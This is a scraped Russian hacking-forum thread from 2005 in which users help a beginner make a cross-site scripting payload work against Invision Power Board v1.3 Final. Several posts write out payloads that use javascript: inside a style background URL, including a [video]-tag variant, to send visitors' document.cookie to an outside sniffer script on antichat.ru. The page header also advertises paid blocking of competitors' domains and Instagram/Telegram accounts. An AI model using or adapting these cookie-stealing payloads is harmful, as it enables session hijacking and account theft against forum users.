Форум АНТИЧАТ - Вопрос по использованию XSS на Powered by Invision Power Board(U) v1.3 Final

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Вопрос по использованию XSS на Powered by Invision Power Board(U) v1.3 Final

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

Вопрос по использованию XSS на Powered by Invision Power Board(U) v1.3 Final

31.01.2005, 18:36

rsha1988

Участник форума

Регистрация: 03.01.2005

Сообщений: 270

Провел на форуме:
58594

Репутация: 6

Вопрос по использованию XSS на Powered by Invision Power Board(U) v1.3 Final

В форуме Powered by Invision Power Board(U) v1.3 Final © 2003 IPS, Inc.
вставляю :
'>` style=background:url(javascript:document.images[68].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)
И чето не каких кук в снифере не вижу!
Что я сделал неправильно?

31.01.2005, 19:42

Del

Новичок

Регистрация: 24.01.2005

Сообщений: 6

Провел на форуме:
10023

Репутация: 0

В файнале фильтруются многие символы...
Посмотри Html
Кстати фильтр мешает ещё и спаренные тэги использовать

31.01.2005, 19:51

rsha1988

Участник форума

Регистрация: 03.01.2005

Сообщений: 270

Провел на форуме:
58594

Репутация: 6

А можно чуть чуть по подробнее?
Я вставляю в сообщение эту фигню:
'>` style=background:url(javascript:document.images[68].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)
и она не меняеться не фига когда попадает в тему, так же и остаеться!

31.01.2005, 23:34

Del

Новичок

Регистрация: 24.01.2005

Сообщений: 6

Провел на форуме:
10023

Репутация: 0

А к какому тэгу у тебя style в итоге относится?

31.01.2005, 23:45

rsha1988

Участник форума

Регистрация: 03.01.2005

Сообщений: 270

Провел на форуме:
58594

Репутация: 6

Фиг знает....
Я же всетаки начанающий...

05.02.2005, 18:56

foreva

Участник форума

Регистрация: 05.02.2005

Сообщений: 121

Провел на форуме:
0

Репутация: 10

Отправить сообщение для foreva с помощью ICQ

Вообще-то баг работает через определенные теги!
например:

Код:

[video]http://1.ru e=`[/video]` style=display:none;background:url(javascript:document.images[68].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie) Lol

Читай внимательнее инфу на сайте!!
http://antichat.ru/txt/IPB/

05.02.2005, 21:33

byte57

Постоянный

Регистрация: 22.01.2005

Сообщений: 764

Провел на форуме:
1086047

Репутация: 67

rsha1988, напиши как парсится в предпросмотре....

07.02.2005, 03:01

rsha1988

Участник форума

Регистрация: 03.01.2005

Сообщений: 270

Провел на форуме:
58594

Репутация: 6

Цитата:

Сообщение от .::Gh0st::.

rsha1988, напиши как парсится в предпросмотре....

переведи...

07.02.2005, 06:39

BlackPrince

Познающий

Регистрация: 13.10.2004

Сообщений: 82

Провел на форуме:
102923

Репутация: 13

Отправить сообщение для BlackPrince с помощью ICQ

Цитата:

Сообщение от rsha1988

переведи...

Скажи, что получается в HTML

#10

08.02.2005, 20:14

rsha1988

Участник форума

Регистрация: 03.01.2005

Сообщений: 270

Провел на форуме:
58594

Репутация: 6

[video]http://1.ru e=`[/video]` style=display:none;background:none;background:url( javascript:docum ent.images[68].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie) Lol - эт и получаеться!

Страница 1 из 2

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Уязвимости в Invision Power Board(U) v1.3 PF1. Вопрос.	dukalis(AwP)	Форумы	14	19.04.2006 19:40
Вопросы по форуму Invision Power Board(U) v1.3 Final © 2003(р)	FRTD	Форумы	50	02.04.2005 02:48
SQL запрос в Powered by Invision Power Board(U) v1.3	Майор	Форумы	4	17.01.2005 01:56
Вопрос про уязвимости в Invision Power Board(U) v1.3 Final	Майор	Форумы	15	14.01.2005 14:20

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход